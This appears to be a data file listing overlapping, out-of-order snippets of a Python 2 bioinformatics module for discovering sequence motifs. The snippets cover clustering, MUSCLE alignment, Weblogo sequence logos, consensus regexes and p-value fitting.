"serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f",
"iter(iterable) while True: items = [] for i in range(n): it = iterable.next()",
"in sorted(seqs_summary): cluster_ids = [cluster_id for begin, end, cluster_id in seqs_summary[seq_id]] centers =",
"min_cluster_size: return True else: return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3,",
"definition logger.debug('After merge, %d motives' % len(motives)) return motives def quality_filter(self, seqs=None, motives=None,",
"logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos else:",
"def create_logo(self, seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\" # seperate headers headers,",
"cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' *",
"mp.Pool() else: pool = mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for",
"scores_items = [] for i, p in enumerate(results): loc_start_time = time.time() scores =",
"SeqRecord from corebio.seq import Alphabet, SeqList import weblogolib as wbl from scipy.cluster.hierarchy import",
"cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j] += 1 if i != j:",
"len(clusters[cluster_id]) > 0: seqs = [s for h, s in clusters[cluster_id]] seq =",
"nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score, i, j",
"self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper",
"if seq: yield seq seq = \"\" line_str = str(line) yield line_str.strip() else:",
"for cluster_id in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image,",
"= Counter(row) k = c.most_common() code = '' for i, row in enumerate(cluster.T):",
"min_freq=0.8): dim = len(align_seqs) cluster = [] for h, align_seq in align_seqs: str_list",
"size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for h, s in haystack: for",
"from sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance import random import pylab as",
"= [] for i, p in enumerate(results): loc_start_time = time.time() scores = p.get()",
"logger.debug(info1 + info2) # update motives motives[i] = motif del motives[j] success =",
"occurrences(c_regex, seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20,",
"np.percentile(locs, 30) else: avg_loc = -1 std_loc = 0 return avg_loc, std_loc def",
"seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Performance evaluation')",
"motives' % len(motives)) return motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives",
"multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0]) start_time",
"= wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format == 'png': return wbl.png_formatter(data, format)",
"%d (#%d) score: %.2f' % \\ (i, n_i, j, n_j, rel_nw_score) info2 =",
"True else: return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\"",
"+ (e - s) / 2 locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist(",
"row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx,",
"/ 2 locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist( locs, nbins, normed=0, facecolor='blue',",
"pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs",
"in motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0] begin, end = tokens[1].split(':') yield",
"logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance(",
"seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos']",
"'protein': self.alphabet = IUPAC.protein elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet",
"size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'],",
"self.a, self.b) p_val = 1 - y return p_val def compute_clusters(self, seqs=None, p_value=0.05):",
"seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d (#%d),",
"data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' %",
"values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def predict(self, value):",
"- half_windw_size:i + half_windw_size]) if min_sig == sig[i]: yield i def box_decomposition(sig, half_windw_size=5):",
"% (time.time() - start_time)) logger.debug('Fitting') start_time = time.time() for i, (p, n) in",
"- start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After",
"y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme]",
"fineprint: options.fineprint = fineprint self.options = options self.output_format = output_format def create_logo(self, seqs=[]):",
"align_seq in trimmed_align_seqs: str_list = [c for c in align_seq] concat_str = np.array(str_list,",
"cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid()",
"return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time =",
"self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator = class_estimator self.clusterer =",
"# ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable,",
"1 - y return p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs =",
"p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1,",
"self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime = time.time()",
"metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc",
"sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x - a) /",
"'' for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() seq",
"cluster.append(concat_str) cluster = np.vstack(cluster) score = 0 to_be_removed = [] for i, row",
"n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator = class_estimator self.clusterer",
"half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) - 1): start",
"block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool()",
"+ 1 cooccurence_mtx = np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id",
"if success is False: break # TODO: run the predictor to learn the",
"begin) / 2) cluster_ids = set(cluster_ids) for i in cluster_ids: for j in",
"= self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------",
"= self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\"",
"if id1 < len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return orders def",
"np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score = 0 to_be_removed = [] for",
"len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives' % len(motives)) return motives def _identify_mergeable_clusters(self,",
"self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt)",
"start_time d_loc_time = time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs)",
"start_time)) logger.debug('Fitting') start_time = time.time() for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time",
">= median_len: sigs = sigs + sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return",
"'wb') as f: f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd =",
"start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items = [] for i, p in enumerate(results):",
"sum(find_occurrences(needle, haystack)) size = len(haystack) return counts, float(counts) / size def extract_consensus(seqs, motives,",
"b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the empirical cumulative distribution.\"\"\" def",
"plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname:",
"> min_cluster_size: return True else: return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10,",
"'' for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() l",
"for header, score, begin, end, subseq in self.decomposition_scores(seqs)] if scores: xs, ys =",
"regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size)",
"= np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig == sig[i]: yield i def",
"min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() -",
"= complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size =",
"from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip import time from sklearn.base import",
"score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for subarray in subarrays: subseq_seq",
"decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size,",
"of regex: %.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info",
"motives.get(j, None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs']",
"return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None,",
"%d' % cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image,",
"= c.most_common() seq += k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8): dim =",
"def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes",
"resolution if fineprint: options.fineprint = fineprint self.options = options self.output_format = output_format def",
"motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality:",
"open(imagename, 'wb') as f: f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd",
"subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters)) return self.clusters except Exception as",
"import random import pylab as plt import joblib from scipy.optimize import curve_fit import",
"score = 0 to_be_removed = [] for i, row in enumerate(cluster.T): c =",
"sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score,",
"= n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size =",
"cooccurence_mtx = np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for begin,",
"motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna'",
"stdout def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers)",
"ys def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores) popt, pcov",
"for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for begin, end, cluster_id in seqs_summary[seq_id]]",
"k[0][1] if float(val) / dim >= min_freq: score += 1 trimmed_align_seqs = []",
"is required # it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize",
"= consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs,",
"consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs':",
"range(len(ids) - 1): start = ids[i] end = ids[i + 1] width =",
"to_be_removed = [] for i, row in enumerate(cluster.T): c = Counter(row) k =",
"default values') logger.debug('ECDF fit on %d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f'",
"wbl from scipy.cluster.hierarchy import linkage import regex as re from collections import Counter",
"np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for i, row in enumerate(cooccurence_mtx): norm",
"abs(c_i - c_j): selected = c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx)",
"sequences.\"\"\" # seperate headers headers, instances = [list(x) for x in zip(*seqs)] if",
"%d (#%d), %d (#%d) score: %.2f' % \\ (i, n_i, j, n_j, rel_nw_score)",
"j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\")",
"options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint = fineprint self.options =",
"maxhours=None, # TODO: check if this alphabet is required # it over-rides tool.alphabet",
"iterable = self.decompose(seqs, p_value=p_value) for header, begin, end, p, subseq in iterable: new_header",
"cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i = motives[i]['regex_seq']",
"score += 1 trimmed_align_seqs = [] for h, align_seq in align_seqs: trimmed_align_seq =",
"= plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type))",
"0 return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids: for",
"import time from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster",
"box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) - 1):",
"sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign,",
"= min(d_ij) for c_i in centers[i]: for c_j in centers[j]: if selected_abs ==",
"if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig",
"muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout):",
"end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) / 2) cluster_ids =",
"\"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size,",
"format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) #",
"min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs =",
"\"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4 self.b = 1 def ecdf(self, x):",
"estimator=estimator) subarrays_items = [] for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays",
"fr = motives[cluster_id]['freq'] info = ' - num occurrences of regex: %d' %",
"begin, end, subseq in self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores) popt, pcov",
"/ float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod)",
"in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time =",
"an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case =",
"def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic' wb =",
"(%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return scores_items #",
"SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return",
"= code[0] else: code_str = '(' + '|'.join(code) + ')' return code_str def",
"in cluster_ids: cooccurence_mtx[i, j] += 1 if i != j: # find closest",
"id in motives] seqs_summary = defaultdict(list) for seq_id, begin, end, i in hits(motives,",
"if self.output_format == 'png': return wbl.png_formatter(data, format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data,",
"motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True):",
"np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f'",
"alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs):",
"size = len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c = Counter(row) k =",
"start_time = time.time() subarrays_items = [] for i, p in enumerate(results): loc_start_time =",
"d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets)",
"sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = ' - %.2s %s'",
"motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 *",
"val, start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h,",
"val = sum(sig[start:end]) yield val, start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len",
"self.clusters = defaultdict(list) for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d",
"int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return zip(headers, motif_seqs) def transform(self, seqs=[]):",
"= [score for seq, score in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None,",
"max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity,",
"apply_async import numpy as np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence",
"consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq in trimmed_align_seqs: str_list =",
"= -4 self.b = 1 def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs",
"info = ' - num occurrences of regex: %d' % (co) txt.append(info) info",
"score = float(score) loc = header.split('<loc>')[1] begin, end = loc.split(':') begin = int(begin)",
"= min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id in clusters: start_time = time.time()",
"co-occurences %d %s vs %d %s: %d' % \\ (cluster_id, regex_i, j, regex_j,",
"score = subarray['score'] header = orig_header header += '<loc>%d:%d<loc>' % (begin, end) header",
"= float(score) loc = header.split('<loc>')[1] begin, end = loc.split(':') begin = int(begin) end",
"self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib for",
"pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100,",
"sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start, end,",
"%.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i)",
"defaultdict from eden import apply_async import numpy as np from scipy.sparse import vstack",
"2 locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3)",
"zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout",
"= int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score, begin, end,",
"from Bio.Alphabet import IUPAC from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from",
"size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i = motives[i]['regex_seq'] if j",
"= p.get() matrices += pos_data_matrix d_time = time.time() - start_time d_loc_time = time.time()",
"(delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None,",
"[] for i, p in enumerate(results): loc_start_time = time.time() scores = p.get() scores_items",
"is not None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data)",
"parameters.') def _save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with",
"min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives def",
"[cluster_id for begin, end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for begin, end,",
"all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i =",
"return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items =",
"def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) >",
"loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return",
"= ids[i] end = ids[i + 1] width = end - start val",
"= mp.Pool() else: pool = mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer))",
"p, subseq except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception',",
"cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)]",
"sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size)",
"= time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta:",
"[%d is now #%d]' % \\ (j, i, n_i + n_j) logger.debug(info1 +",
"start_time)) logger.debug('Vectorizing') start_time = time.time() matrices = [] for i, p in enumerate(results):",
"start_time = time.time() for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time()",
"'\" style=\"width: 100%\"></p>') else: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url",
"/ n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d",
"= letter_regex(k, size, regex_th=regex_th) if l: code += l return code def find_occurrences(needle,",
"smod.score(seqs): sig = np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch: %d != %d'",
"int(begin) end = int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score,",
"params: a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value,",
"pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close()",
"= np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for begin, end,",
"exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size,",
"return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if",
"in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Annotating') start_time =",
"= neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator",
"return motives else: logger.debug('After quality filter, %d motives' % len(_motives)) return _motives def",
"= seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >=",
"exc_info=True) def _order_clusters(self, clusters, complexity=3): sep = ' ' * (complexity * 2)",
"== 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else:",
"neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs)",
"for c_i in centers[i]: for c_j in centers[j]: if selected_abs == abs(c_i -",
"motives[cluster_id]['std_pos'] info = ' - average location: %.1f +- %.1f' % (av, st)",
"if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>') else: txt.append('<p",
"= ' - consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info = ' -",
"s in seqs: if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2),",
"fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb') as f: f.write(logo)",
"% len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix = multiprocess_vectorize(",
"in range(len(ids) - 1): start = ids[i] end = ids[i + 1] width",
"start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' % (i,",
"100) else: logger.warning( 'No motives to report. Try more permissive parameters.') txt =",
"seq = \"\" for line in lines: if line: if line[0] == '>':",
"logger.warning('Quality filter is too strict. Ignoring filter.') return motives else: logger.debug('After quality filter,",
"co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = ' - num occurrences of",
"= len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common()",
"np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig)",
"= figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis",
"# ['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters =",
"seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score =",
"!= 0: row /= norm else: row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row)",
"pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs,",
"for h, align_seq in trimmed_align_seqs: str_list = [c for c in align_seq] concat_str",
"+ 1) / float(len(xs)) return xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code",
"data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() - start_time d_loc_time",
"MiniBatchKMeans from eden.sequence import Vectorizer from StringIO import StringIO from Bio import SeqIO",
